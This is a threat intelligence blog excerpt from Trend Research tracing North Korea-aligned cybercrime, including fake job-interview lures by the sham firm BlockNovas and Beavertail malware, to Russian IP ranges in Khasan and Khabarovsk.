Russian Infrastructure Plays Crucial Role in North Korean Cybercrime Operations

• Trend Research has identified multiple IP address ranges in Russia that are being used for cybercrime activities aligned with North Korea. These activities are associated with a cluster of campaigns related to the Void Dokkaebi intrusion set, also known as Famous Chollima.
• The Russian IP address ranges, which are concealed by a large anonymization network that uses commercial VPN services, proxy servers, and numerous VPS servers with RDP, are assigned to two companies in Khasan and Khabarovsk. Khasan is a mile from the North Korea-Russia border, and Khabarovsk is known for its economic and cultural ties with North Korea.
• Trend Research assesses that North Korea deployed IT workers who connect back to their home country through two IP addresses in the Russian IP ranges and two IP addresses in North Korea. Trend Micro’s telemetry strongly suggests these DPRK aligned IT workers work from China, Russia and Pakistan, among others.
• Based on Trend Research’s assessment, North Korea-aligned actors use the Russian IP ranges to connect to dozens of VPS servers over RDP, then perform tasks like interacting on job recruitment sites and accessing cryptocurrency-related services. Some servers involved in their brute-force activity to crack cryptocurrency wallet passwords fall within one of the Russian IP ranges.
• Instructional videos have also been found with what it looks like non-native English text, detailing how to set up a Beavertail malware command-and-control server and how to crack cryptocurrency wallet passwords. This makes it plausible that North Korea is also working with foreign conspirators.
• IT professionals in Ukraine, US, and Germany have been targeted in these campaigns by fictitious companies that lure them into fraudulent job interviews. Trend Research assesses that the primary focus of Void Dokkaebi is to steal cryptocurrency from software professionals interested in cryptocurrency, Web3, and blockchain technologies.
• Trend Vision One™ detects and blocks the IOCs discussed in this blog. Trend Vision One customers can also access hunting queries, threat insights, and threat intelligence reports to gain rich context and the latest updates on Void Dokkaebi.

Internet access is scarce in North Korea; their national network only has 1,024 IP addresses assigned to it, yet the country’s role in cybercrime is significant. Multiple high-profile campaigns were publicly attributed to North Korean actors by international law enforcement, one of the latest being the US$1.5 billion Bybit hack. Naturally, to scale cybercrime to the levels attributed to North Korea, a lot more internet resources are needed than the 1,024 IP addresses. One way to achieve this is to send or hire significant numbers of IT workers abroad and let them work from there. Additionally, large-scale anonymization networks are being used to conceal campaigns linked to North Korea; these anonymization layers hide the origin of malicious traffic and make attribution harder.

In this blog entry, we will discuss how some of the campaigns linked to North Korea originate from five Russian IP ranges. These IP ranges are hidden from plain sight by a VPN layer, a proxy layer, or an RDP layer. They have been assigned to two organizations in Khasan and Khabarovsk, Russia. We assess that campaigns linked to North Korea also make use of the internet infrastructure in other countries.  

Khasan is a small town in Russia that is only one mile away from the border with North Korea and China. It is home to a railway bridge called the Korea-Russia Friendship bridge. Khabarovsk is known for its economic and cultural ties with North Korea. Therefore, these two towns are a natural fit for the home of cybercrime operations that are aligned with the objectives of North Korea. We found that the Russian IP ranges connect to numerous VPS servers around the world using RDP and then do tasks from there, like communicating through apps like Skype, Telegram, Discord and Slack, contacting foreign IT professionals on job recruitment sites and connecting to cryptocurrency-related websites, for example, to empty stolen cryptocurrency wallets or launder money.

Foreign IT professionals are contacted as part of a common social engineering tactic that involves enticing software developers with fake job interviews. In this scheme, developers apply for positions advertised on platforms like LinkedIn and other recruitment sites. The supposed recruiter requests the applicant to complete specific tasks as part of the interview process. These tasks may involve debugging or enhancing code that the applicant must download from reputable code repositories such as GitHub, GitLab, Bitbucket, or private GitLab sites.  While these repositories often do not host malicious code directly, they may contain code that injects obfuscated, harmful scripts hosted on third-party websites. When the applicant runs the downloaded code on their personal computer or a production system, rather than in an isolated virtual environment, the attacker gains access to the applicant’s system.

Once inside, the attacker might install other malware that will automatically look for sensitive data like passwords and cryptocurrency wallets. They may then proceed to try to empty the cryptocurrency wallets and steal other sensitive data too. Some compromised devices get integrated into the attacker’s anonymizing infrastructure by installing legitimate proxy software like CCProxy.

In another scheme, North Korean IT workers secure IT-related jobs at Western companies and utilize laptop farms operated by co-conspirators residing in the West. By using these laptop farms, North Korean IT workers can conceal the fact that they are working remotely for a foreign country from their victim companies. Trend Research assesses that this scheme is closely related to Beavertail malware campaigns.

This blog entry also explores clusters of Beavertail malware campaigns attributed to Void Dokkaebi (also known as Famous Chollima). We focused on a fictitious company called BlockNovas, which has a website and a presence on several job recruitment platforms, including LinkedIn and Upwork. Hundreds of applicants have responded to BlockNovas’ job postings, with several of them getting infected with malware during the interview process. BlockNovas posted job openings targeting Web3 and blockchain experts in Ukraine, US, Germany and other countries. BlockNovas has utilized Beavertail and Invisible Ferret malware, as well as employed tactics where applicants are enticed to download and execute malware to solve a fictitious problem with their laptop camera during an automated job interviewing process.

While investigating BlockNovas, we discovered that lower levels of the anonymization layers are IP ranges in Russia, which we mentioned earlier in this introduction. Another cluster of Beavertail command-and-control (C&C) servers has been administered through VPN, proxies and RDP sessions from the same Russian IP ranges as well.

This leads us to an intriguing hypothesis: Key North Korean offensive cyber activities are conducted from or through internet infrastructure located in the Russian towns of Khasan and Khabarovsk; such infrastructure has been set up since 2017 and increased in size since 2023.

BlockNovas

One of the fictitious companies used to lure victims into these fraudulent interviews is BlockNovas[.]com, which presents itself with a modern designed website and claims to be active in blockchain technologies (Figure 1). It maintains a presence on social media platforms such as Facebook, X (formerly known as Twitter), LinkedIn, and various job recruitment websites. This online presence is designed to enhance its credibility and attract unsuspecting software developers into applying for non-existent positions.

BlockNovas is likely using artificial intelligence (AI) to help them create online personas and conduct the interview process. A lot of legitimate job interviews in the technology space are held online, and this may have resulted in more job applicants letting their guard down. We observed BlockNovas for some time on LinkedIn and other recruitment sites, and found that fictious new BlockNovas employees at key positions – like a chief technology officer (CTO) – popped up from seemingly nowhere. However, these profiles often had some history on the social media network and usually hundreds of followers. Occasionally, compromised accounts were also used to amplify new job postings. With what seems like a credible online presence at first sight, BlockNovas has probably reached hundreds of job applicants. 

Read More HERE